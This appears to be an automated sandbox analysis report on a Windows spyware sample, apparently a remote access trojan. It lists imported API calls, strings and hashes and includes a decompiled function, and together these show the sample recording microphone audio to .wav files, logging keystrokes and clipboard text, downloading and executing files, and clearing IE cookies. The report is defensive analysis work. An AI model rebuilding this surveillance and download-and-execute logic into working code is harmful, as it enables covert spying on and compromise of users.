                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                  • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                    • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                    • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                    • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                    • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                    • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                  • String ID:
                                  • API String ID: 3909728815-0
                                  • Opcode ID: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                  • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                  • Opcode Fuzzy Hash: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                  • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E00401640(void* __edx, intOrPtr _a8, char _a11) {
                                  				char _v5;
                                  				char _v12;
                                  				void* _v28;
                                  				char _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				char _v108;
                                  				char _v188;
                                  				int _t23;
                                  				char* _t25;
                                  				char* _t32;
                                  				char* _t33;
                                  				char* _t34;
                                  				CHAR* _t36;
                                  				intOrPtr _t37;
                                  				void* _t56;
                                  
                                  				_t23 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
                                  				if(_a8 == 0x3c0) {
                                  					__imp__time( &_v12, _t56);
                                  					_t25 =  &_v12;
                                  					__imp__localtime(_t25);
                                  					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
                                  					_t32 =  &_v76;
                                  					L00414152();
                                  					_t33 =  &_v108;
                                  					L0041414C();
                                  					_t34 =  &_v60;
                                  					L00414146();
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					E004013BE(_t34, 0x41b1a0);
                                  					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					0x41b1a0->lpData = _t36;
                                  					_t37 =  *0x41b1d8; // 0x0
                                  					 *0x41b1a4 = _t37;
                                  					 *0x41b1a8 = 0;
                                  					 *0x41b1ac = 0;
                                  					 *0x41b1b0 = 0;
                                  					 *0x41b1b4 = 0;
                                  					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                  					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t23;
                                  			}

Instruction addresses (disassembly view; only the address column was extracted): 0x00401649, 0x00401650, 0x0040165d, 0x00401668, 0x0040166e, 0x00401672, 0x00401687, 0x0040169e, 0x004016bb, 0x004016c4, 0x004016cd, 0x004016d1, 0x004016da, 0x004016de, 0x004016ea, 0x004016f3, 0x004016fc, 0x00401705, 0x0040170e, 0x00401717, 0x00401726, 0x0040172d, 0x0040173d, 0x00401748, 0x0040174e, 0x00401753, 0x00401758, 0x0040175f, 0x00401764, 0x00401769, 0x0040176e, 0x0040177c, 0x0040178b, 0x00401791, 0x00401795, 0x0040179c

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                  • time.MSVCRT ref: 00401668
                                  • localtime.MSVCRT ref: 00401672
                                  • strftime.MSVCRT ref: 00401687
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                    • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                  • String ID: %Y-%m-%d %H.%M$.wav
                                  • API String ID: 4079669728-3597965672
                                  • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                  • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                  • toupper.MSVCRT ref: 0040698A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                  • toupper.MSVCRT ref: 00406A61
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                  • tolower.MSVCRT ref: 00406A3A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                  Strings
                                  • [Ctrl + , xrefs: 00406996
                                  • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                  • [End of clipboard text], xrefs: 004069EC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                  • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                  • API String ID: 1567161615-398269065
                                  • Opcode ID: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                  • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                  • Opcode Fuzzy Hash: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                  • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                  • free.MSVCRT(?,0041BA5C,?), ref: 0040D643
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                  • String ID: open
                                  • API String ID: 2294739476-2758837156
                                  • Opcode ID: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                  • Opcode Fuzzy Hash: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 0040B522: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.ADVAPI32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                  • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
